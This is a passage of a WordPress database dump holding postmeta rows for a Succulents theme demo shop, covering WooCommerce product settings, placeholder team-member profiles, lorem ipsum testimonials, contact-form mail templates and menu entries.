_id\";a:0:{}}'),(7818,1106,'_sku','12'),(7819,1106,'_regular_price','77'),(7820,1106,'_sale_price',''),(7821,1106,'_sale_price_dates_from',''),(7822,1106,'_sale_price_dates_to',''),(7823,1106,'total_sales','0'),(7824,1106,'_tax_status','taxable'),(7825,1106,'_tax_class',''),(7826,1106,'_manage_stock','no'),(7827,1106,'_backorders','no'),(7828,1106,'_sold_individually','no'),(7829,1106,'_weight','0.3'),(7830,1106,'_length','20'),(7831,1106,'_width','30'),(7832,1106,'_height','70'),(7833,1106,'_upsell_ids','a:0:{}'),(7834,1106,'_crosssell_ids','a:0:{}'),(7835,1106,'_purchase_note',''),(7836,1106,'_default_attributes','a:0:{}'),(7837,1106,'_virtual','no'),(7838,1106,'_downloadable','no'),(7839,1106,'_product_image_gallery','1190,1188,1187'),(7840,1106,'_download_limit','-1'),(7841,1106,'_download_expiry','-1'),(7842,1106,'_stock',''),(7843,1106,'_stock_status','instock'),(7844,1106,'_wc_average_rating','0'),(14217,5435,'qodef_disable_header_widget_menu_area_meta','no'),(7846,1106,'_wc_review_count','0'),(7847,1106,'_downloadable_files','a:0:{}'),(7848,1106,'_product_attributes','a:0:{}'),(7849,1106,'_product_version','4.0.4'),(7850,1106,'_price','77'),(7851,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7852,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7853,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7854,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7855,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7856,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7857,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7858,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7859,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7860,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7861,1106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7862,1106,'qodef_show_new_sign_woo_meta','no'),(7863,1106,'slide_template',''),(7864,1106,'_wpb_vc_js_status','true'),(7865,1106,'_wp_old_slug','keto-oats'),(7866,1106,'_thumbnail_id','2176'),(7867,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7868,1107,'_sku','13'),(7869,1107,'_regular_price','84'),(7870,1107,'_sale_price',''),(7871,1107,'_sale_price_dates_from',''),(7872,1107,'_sale_price_dates_to',''),(7873,1107,'total_sales','0'),(7874,1107,'_tax_status','taxable'),(7875,1107,'_tax_class',''),(7876,1107,'_manage_stock','no'),(7877,1107,'_backorders','no'),(7878,1107,'_sold_individually','no'),(7879,1107,'_weight','0.3'),(7880,1107,'_length','20'),(7881,1107,'_width','30'),(7882,1107,'_height','70'),(7883,1107,'_upsell_ids','a:0:{}'),(7884,1107,'_crosssell_ids','a:0:{}'),(7885,1107,'_purchase_note',''),(7886,1107,'_default_attributes','a:0:{}'),(7887,1107,'_virtual','no'),(7888,1107,'_downloadable','no'),(7889,1107,'_product_image_gallery','1196,1194,1195'),(7890,1107,'_download_limit','-1'),(7891,1107,'_download_expiry','-1'),(7892,1107,'_stock',''),(7893,1107,'_stock_status','instock'),(7894,1107,'_wc_average_rating','0'),(7896,1107,'_wc_review_count','0'),(7897,1107,'_downloadable_files','a:0:{}'),(7898,1107,'_product_attributes','a:0:{}'),(7899,1107,'_product_version','4.0.4'),(7900,1107,'_price','84'),(7901,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7902,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7903,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7904,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7905,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7906,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7907,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7908,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7909,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7910,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7911,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7912,1107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7913,1107,'qodef_show_new_sign_woo_meta','no'),(7914,1107,'slide_template',''),(7915,1107,'_wpb_vc_js_status','true'),(7916,1107,'_wp_old_slug','aero-aromathic-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy'),(7917,1107,'_wp_old_slug','lean-seeds'),(7918,1107,'_thumbnail_id','2177'),(7919,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7920,1110,'_sku','16'),(7921,1110,'_regular_price','79'),(7922,1110,'_sale_price',''),(7923,1110,'_sale_price_dates_from',''),(7924,1110,'_sale_price_dates_to',''),(7925,1110,'total_sales','0'),(7926,1110,'_tax_status','taxable'),(7927,1110,'_tax_class',''),(7928,1110,'_manage_stock','no'),(7929,1110,'_backorders','no'),(7930,1110,'_sold_individually','no'),(7931,1110,'_weight','0.3'),(7932,1110,'_length','20'),(7933,1110,'_width','30'),(7934,1110,'_height','70'),(7935,1110,'_upsell_ids','a:0:{}'),(7936,1110,'_crosssell_ids','a:0:{}'),(7937,1110,'_purchase_note',''),(7938,1110,'_default_attributes','a:0:{}'),(7939,1110,'_virtual','no'),(7940,1110,'_downloadable','no'),(7941,1110,'_product_image_gallery','2480,2481,2482'),(7942,1110,'_download_limit','-1'),(7943,1110,'_download_expiry','-1'),(7944,1110,'_stock',''),(7945,1110,'_stock_status','instock'),(7946,1110,'_wc_average_rating','0'),(14218,5435,'slide_template','default'),(7948,1110,'_wc_review_count','0'),(7949,1110,'_downloadable_files','a:0:{}'),(7950,1110,'_product_attributes','a:0:{}'),(7951,1110,'_product_version','4.0.4'),(7952,1110,'_price','79'),(7953,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7954,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7955,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7956,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7957,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7958,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7959,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7960,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7961,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7962,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7963,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7964,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7965,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7966,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7967,1110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7968,1110,'qodef_show_new_sign_woo_meta','no'),(7969,1110,'slide_template',''),(7970,1110,'_wpb_vc_js_status','true'),(7971,1110,'_wp_old_slug','aero-aromathic-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy-copy'),(7972,1110,'_thumbnail_id','2479'),(7973,1608,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7974,1608,'slide_template',''),(7975,1608,'_wp_old_slug','kolona'),(7976,1612,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7977,1612,'slide_template','default'),(7978,1613,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7979,1613,'slide_template','default'),(7980,1614,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7981,1614,'slide_template','default'),(7982,2054,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(7983,2054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7984,2054,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(7985,2054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7986,2054,'qodef_page_content_behind_header_meta','no'),(7987,2054,'qodef_boxed_background_image_attachment_meta','fixed'),(7988,2054,'qodef_disable_vertical_header_background_image_meta','no'),(7989,2054,'qodef_disable_header_widget_logo_area_meta','no'),(7990,2054,'qodef_disable_header_widget_menu_area_meta','no'),(7991,2054,'slide_template','default'),(7992,2054,'_wpb_vc_js_status','true'),(7993,2054,'qodef_show_title_area_meta','yes'),(7994,2054,'_wp_old_slug','378'),(7995,2054,'qodef_page_content_top_padding','86'),(7996,2054,'qodef_page_content_top_padding_mobile','yes'),(7997,2054,'qodef_team_member_birth_date','October 20, 1992'),(7998,2054,'qodef_team_member_email','support@select-themes.com'),(7999,2054,'qodef_team_member_phone','+1235 4567 5668'),(8000,2054,'qodef_team_member_address','New York'),(8001,2054,'qodef_team_member_education','New York University'),(8002,2054,'qodef_team_member_social_icon_pack_1','font_awesome'),(8003,2054,'qodef_team_member_social_icon_pack_1_fa_icon','fa-tumblr'),(8004,2054,'qodef_team_member_social_icon_1_link','https://www.tumblr.com'),(8005,2054,'qodef_team_member_social_icon_1_target','_blank'),(8006,2054,'qodef_team_member_social_icon_pack_2','font_awesome'),(8007,2054,'qodef_team_member_social_icon_pack_2_fa_icon','fa-pinterest'),(8008,2054,'qodef_team_member_social_icon_2_link','https://www.pinterest.com'),(8009,2054,'qodef_team_member_social_icon_2_target','_blank'),(8010,2054,'qodef_team_member_social_icon_pack_3','font_awesome'),(8011,2054,'qodef_team_member_social_icon_pack_3_fa_icon','fa-facebook'),(8012,2054,'qodef_team_member_social_icon_3_link','https://www.facebook.com'),(8013,2054,'qodef_team_member_social_icon_3_target','_blank'),(8014,2054,'qodef_team_member_social_icon_pack_4','font_awesome'),(8015,2054,'qodef_team_member_social_icon_pack_4_fa_icon','fa-instagram'),(8016,2054,'qodef_team_member_social_icon_4_link','https://www.instagram.com'),(8017,2054,'qodef_team_member_social_icon_4_target','_blank'),(8018,2054,'qodef_set_menu_area_position_meta','center'),(8019,2054,'qodef_title_area_height_meta','140'),(8020,2054,'qodef_team_member_position','Designer'),(8021,2054,'qodef_title_area_title_tag_meta','h3'),(8022,2054,'qodef_sidebar_layout_meta','sidebar-33-right'),(8023,2054,'_thumbnail_id','2055'),(8024,2054,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8025,2054,'_dp_original','378'),(8026,2054,'_wp_old_slug','maria-yong'),(8027,2056,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8028,2056,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8029,2056,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8030,2056,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8031,2056,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8032,2056,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8033,2056,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8034,2056,'qodef_page_content_behind_header_meta','no'),(8035,2056,'qodef_boxed_background_image_attachment_meta','fixed'),(8036,2056,'qodef_disable_vertical_header_background_image_meta','no'),(8037,2056,'qodef_disable_header_widget_logo_area_meta','no'),(8038,2056,'qodef_disable_header_widget_menu_area_meta','no'),(8039,2056,'slide_template','default'),(8040,2056,'_wpb_vc_js_status','true'),(8041,2056,'qodef_show_title_area_meta','yes'),(8042,2056,'_wp_old_slug','378'),(8043,2056,'_wp_old_slug','maria-yong'),(8044,2056,'qodef_page_content_top_padding','86'),(8045,2056,'qodef_page_content_top_padding_mobile','yes'),(8046,2056,'qodef_team_member_birth_date','October 20, 1992'),(8047,2056,'qodef_team_member_email','support@select-themes.com'),(8048,2056,'qodef_team_member_phone','+1235 4567 5668'),(8049,2056,'qodef_team_member_address','New York'),(8050,2056,'qodef_team_member_education','New York University'),(8051,2056,'qodef_team_member_social_icon_pack_1','font_awesome'),(8052,2056,'qodef_team_member_social_icon_pack_1_fa_icon','fa-tumblr'),(8053,2056,'qodef_team_member_social_icon_1_link','https://www.tumblr.com'),(8054,2056,'qodef_team_member_social_icon_1_target','_blank'),(8055,2056,'qodef_team_member_social_icon_pack_2','font_awesome'),(8056,2056,'qodef_team_member_social_icon_pack_2_fa_icon','fa-pinterest'),(8057,2056,'qodef_team_member_social_icon_2_link','https://www.pinterest.com'),(8058,2056,'qodef_team_member_social_icon_2_target','_blank'),(8059,2056,'qodef_team_member_social_icon_pack_3','font_awesome'),(8060,2056,'qodef_team_member_social_icon_pack_3_fa_icon','fa-facebook'),(8061,2056,'qodef_team_member_social_icon_3_link','https://www.facebook.com'),(8062,2056,'qodef_team_member_social_icon_3_target','_blank'),(8063,2056,'qodef_team_member_social_icon_pack_4','font_awesome'),(8064,2056,'qodef_team_member_social_icon_pack_4_fa_icon','fa-instagram'),(8065,2056,'qodef_team_member_social_icon_4_link','https://www.instagram.com'),(8066,2056,'qodef_team_member_social_icon_4_target','_blank'),(8067,2056,'qodef_set_menu_area_position_meta','center'),(8068,2056,'qodef_title_area_height_meta','140'),(8069,2056,'qodef_team_member_position','Producer'),(8070,2056,'qodef_title_area_title_tag_meta','h3'),(8071,2056,'qodef_sidebar_layout_meta','sidebar-33-right'),(8072,2056,'_dp_original','2054'),(8073,2056,'_wp_old_slug','nate-foller'),(8074,2056,'_thumbnail_id','2748'),(8075,2058,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8076,2058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8077,2058,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8078,2058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8079,2058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8080,2058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8081,2058,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8082,2058,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8083,2058,'_wpb_shortcodes_custom_css','.vc_custom_1517828680323{padding-bottom: 21px !important;}'),(8084,2058,'qodef_page_content_behind_header_meta','no'),(8085,2058,'qodef_boxed_background_image_attachment_meta','fixed'),(8086,2058,'qodef_disable_vertical_header_background_image_meta','no'),(8087,2058,'qodef_disable_header_widget_logo_area_meta','no'),(8088,2058,'qodef_disable_header_widget_menu_area_meta','no'),(8089,2058,'slide_template','default'),(8090,2058,'_wpb_vc_js_status','true'),(8091,2058,'qodef_show_title_area_meta','yes'),(8092,2058,'_wp_old_slug','378'),(8093,2058,'_wp_old_slug','maria-yong'),(8094,2058,'_wp_old_slug','nate-foller'),(8095,2058,'qodef_page_content_top_padding','86'),(8096,2058,'qodef_page_content_top_padding_mobile','yes'),(8097,2058,'qodef_team_member_birth_date','October 20, 1992'),(8098,2058,'qodef_team_member_email','support@select-themes.com'),(8099,2058,'qodef_team_member_phone','+1235 4567 5668'),(8100,2058,'qodef_team_member_address','New York'),(8101,2058,'qodef_team_member_education','New York University'),(8102,2058,'qodef_team_member_social_icon_pack_1','font_awesome'),(8103,2058,'qodef_team_member_social_icon_pack_1_fa_icon','fa-tumblr'),(8104,2058,'qodef_team_member_social_icon_1_link','https://www.tumblr.com'),(8105,2058,'qodef_team_member_social_icon_1_target','_blank'),(8106,2058,'qodef_team_member_social_icon_pack_2','font_awesome'),(8107,2058,'qodef_team_member_social_icon_pack_2_fa_icon','fa-pinterest'),(8108,2058,'qodef_team_member_social_icon_2_link','https://www.pinterest.com'),(8109,2058,'qodef_team_member_social_icon_2_target','_blank'),(8110,2058,'qodef_team_member_social_icon_pack_3','font_awesome'),(8111,2058,'qodef_team_member_social_icon_pack_3_fa_icon','fa-facebook'),(8112,2058,'qodef_team_member_social_icon_3_link','https://www.facebook.com'),(8113,2058,'qodef_team_member_social_icon_3_target','_blank'),(8114,2058,'qodef_team_member_social_icon_pack_4','font_awesome'),(8115,2058,'qodef_team_member_social_icon_pack_4_fa_icon','fa-instagram'),(8116,2058,'qodef_team_member_social_icon_4_link','https://www.instagram.com'),(8117,2058,'qodef_team_member_social_icon_4_target','_blank'),(8118,2058,'qodef_set_menu_area_position_meta','center'),(8119,2058,'qodef_title_area_height_meta','140'),(8120,2058,'qodef_team_member_position','Chef'),(8121,2058,'qodef_title_area_title_tag_meta','h3'),(8122,2058,'qodef_sidebar_layout_meta','sidebar-33-right'),(8123,2058,'_dp_original','2056'),(8124,2058,'_wp_old_slug','susan-mink'),(8125,2058,'_thumbnail_id','2749'),(8126,2131,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8127,2131,'qodef_testimonial_text','Autem modus lorem ipsum dolor sit amet, offendit disputationi ex vim, in ius consulatu hendrerit sententiae, postulant mei ut In cum corrumpit '),(8128,2131,'qodef_testimonial_author','WILLIAMS GERALD'),(8129,2131,'slide_template','default'),(8130,2131,'_thumbnail_id','2447'),(8131,2289,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8132,2289,'qodef_testimonial_text','In ius consulatu hendrerit sententiae, lorem ipsum dolor sit amet, offendit disputationi ex vim, autem modus postulant mei ut In cum corrumpiti.'),(8133,2289,'qodef_testimonial_author','URSULA COX'),(8134,2289,'slide_template','default'),(8135,2289,'_thumbnail_id','2446'),(8144,4398,'_form',''),(8145,4398,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:27:\"Succulents \"[your-subject]\"\";s:6:\"sender\";s:52:\"[your-name] \";s:9:\"recipient\";s:28:\"succulents@select-themes.com\";s:4:\"body\";s:184:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(8146,4398,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:27:\"Succulents \"[your-subject]\"\";s:6:\"sender\";s:51:\"Succulents \";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:126:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\";s:18:\"additional_headers\";s:38:\"Reply-To: succulents@select-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(8147,4398,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:14:\"date_too_early\";s:44:\"The date is before the earliest one allowed.\";s:13:\"date_too_late\";s:41:\"The date is after the latest one allowed.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";}'),(8148,4398,'_additional_settings',''),(8149,4398,'_locale','en_US'),(8150,4398,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(14229,4398,'_hash','70fcab32dc7e93f601b518ea5956c841a84d16c8'),(14230,5438,'_wp_page_template','full-width.php'),(14231,5438,'_wpb_shortcodes_custom_css','.vc_custom_1519125565610{padding-top: 96px !important;padding-bottom: 12px !important;}.vc_custom_1519140627330{padding-top: 144px !important;padding-bottom: 0px !important;}.vc_custom_1519125692374{padding-top: 82px !important;padding-bottom: 73px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h1-img10.jpg?id=2753) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1518176405299{padding-top: 57px !important;padding-bottom: 132px !important;}.vc_custom_1519124684606{padding-top: 88px !important;padding-bottom: 112px !important;}.vc_custom_1519121697188{padding-bottom: 30px !important;}.vc_custom_1519124340678{padding-top: 85px !important;}.vc_custom_1519124473237{padding-bottom: 63px !important;}.vc_custom_1516619115957{margin-top: -6px !important;}.vc_custom_1516618148023{margin-top: -11px !important;}.vc_custom_1516615809885{margin-top: -10px !important;}'),(8153,159,'_form','
\n\n\n[email* your-email][submit class:button primary “Submit”]\n\n
'),(8154,159,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:32:\"TummyRevolution \"[your-subject]\"\";s:6:\"sender\";s:45:\"[your-name] \";s:9:\"recipient\";s:24:\"info@tummyrevolution.com\";s:4:\"body\";s:184:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\";s:18:\"additional_headers\";s:0:\"\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(8155,159,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:27:\"Succulents \"[your-subject]\"\";s:6:\"sender\";s:51:\"Succulents \";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:126:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\";s:18:\"additional_headers\";s:38:\"Reply-To: succulents@select-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(8156,159,'_messages','a:22:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:14:\"date_too_early\";s:44:\"The date is before the earliest one allowed.\";s:13:\"date_too_late\";s:41:\"The date is after the latest one allowed.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";}'),(8157,159,'_additional_settings',''),(8158,159,'_locale','en_US'),(8160,1615,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8161,1615,'slide_template','default'),(8162,1616,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8163,1616,'slide_template','default'),(8164,1617,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8165,1617,'slide_template','default'),(8166,2495,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(8167,2495,'_form','
\n[textarea textarea-286 \"Message\"][text text-761 placeholder \"Name\"][email email-107 placeholder \"Email\"]\n[submit \"send\"]\n
'),(8168,2495,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:27:\"Succulents \"[your-subject]\"\";s:6:\"sender\";s:52:\"[your-name] \";s:9:\"recipient\";s:28:\"succulents@select-themes.com\";s:4:\"body\";s:184:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(8169,2495,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:27:\"Succulents \"[your-subject]\"\";s:6:\"sender\";s:51:\"Succulents \";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:126:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\";s:18:\"additional_headers\";s:38:\"Reply-To: succulents@select-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(8170,2495,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:14:\"date_too_early\";s:44:\"The date is before the earliest one allowed.\";s:13:\"date_too_late\";s:41:\"The date is after the latest one allowed.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";}'),(8171,2495,'_additional_settings',''),(8172,2495,'_locale','en_US'),(14228,2495,'_hash','73aad83a9ef5e3158ab265633ff9100d9ed7cbb3'),(8174,4399,'_menu_item_type','post_type'),(8175,4399,'_menu_item_menu_item_parent','4351'),(8176,4399,'_menu_item_object_id','10'),(8177,4399,'_menu_item_object','page'),(8178,4399,'_menu_item_target',''),(8179,4399,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8180,4399,'_menu_item_xfn',''),(8181,4399,'_menu_item_url',''),(8190,4401,'_menu_item_type','post_type'),(8191,4401,'_menu_item_menu_item_parent','4352'),(8192,4401,'_menu_item_object_id','406'),(8193,4401,'_menu_item_object','page'),(8194,4401,'_menu_item_target',''),(8195,4401,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8196,4401,'_menu_item_xfn',''),(8197,4401,'_menu_item_url',''),(8198,4402,'_menu_item_type','post_type'),(8199,4402,'_menu_item_menu_item_parent','4352'),(8200,4402,'_m